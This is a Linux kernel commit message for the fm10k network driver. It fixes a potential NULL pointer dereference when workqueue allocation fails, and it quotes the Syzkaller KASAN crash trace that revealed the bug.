fm10k: Fix a potential NULL pointer dereference Syzkaller report this: kasan: GPF could be caused by NULL-ptr deref or user memory access general protection fault: 0000 [#1] SMP KASAN PTI CPU: 0 PID: 4378 Comm: syz-executor.0 Tainted: G C 5.0.0+ #5 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014 RIP: 0010:__lock_acquire+0x95b/0x3200 kernel/locking/lockdep.c:3573 Code: 00 0f 85 28 1e 00 00 48 81 c4 08 01 00 00 5b 5d 41 5c 41 5d 41 5e 41 5f c3 4c 89 ea 48 b8 00 00 00 00 00 fc ff df 48 c1 ea 03 <80> 3c 02 00 0f 85 cc 24 00 00 49 81 7d 00 e0 de 03 a6 41 bc 00 00 RSP: 0018:ffff8881e3c07a40 EFLAGS: 00010002 RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000 RDX: 0000000000000010 RSI: 0000000000000000 RDI: 0000000000000080 RBP: 0000000000000000 R08: 0000000000000001 R09: 0000000000000000 R10: ffff8881e3c07d98 R11: ffff8881c7f21f80 R12: 0000000000000001 R13: 0000000000000080 R14: 0000000000000000 R15: 0000000000000001 FS: 00007fce2252e700(0000) GS:ffff8881f2400000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fffc7eb0228 CR3: 00000001e5bea002 CR4: 00000000007606f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 PKRU: 55555554 Call Trace: lock_acquire+0xff/0x2c0 kernel/locking/lockdep.c:4211 __mutex_lock_common kernel/locking/mutex.c:925 [inline] __mutex_lock+0xdf/0x1050 kernel/locking/mutex.c:1072 drain_workqueue+0x24/0x3f0 kernel/workqueue.c:2934 destroy_workqueue+0x23/0x630 kernel/workqueue.c:4319 __do_sys_delete_module kernel/module.c:1018 [inline] __se_sys_delete_module kernel/module.c:961 [inline] __x64_sys_delete_module+0x30c/0x480 kernel/module.c:961 do_syscall_64+0x9f/0x450 arch/x86/entry/common.c:290 entry_SYSCALL_64_after_hwframe+0x49/0xbe RIP: 0033:0x462e99 Code: f7 d8 64 89 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 
05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 bc ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007fce2252dc58 EFLAGS: 00000246 ORIG_RAX: 00000000000000b0 RAX: ffffffffffffffda RBX: 000000000073bf00 RCX: 0000000000462e99 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000020000140 RBP: 0000000000000002 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 00007fce2252e6bc R13: 00000000004bcca9 R14: 00000000006f6b48 R15: 00000000ffffffff If alloc_workqueue fails, it should return -ENOMEM, otherwise may trigger this NULL pointer dereference while unloading drivers. Reported-by: Hulk Robot <[email protected]> Fixes: 0a38c17a21a0 ("fm10k: Remove create_workqueue") Signed-off-by: Yue Haibing <[email protected]> Tested-by: Andrew Bowers <[email protected]> Signed-off-by: Jeff Kirsher <[email protected]>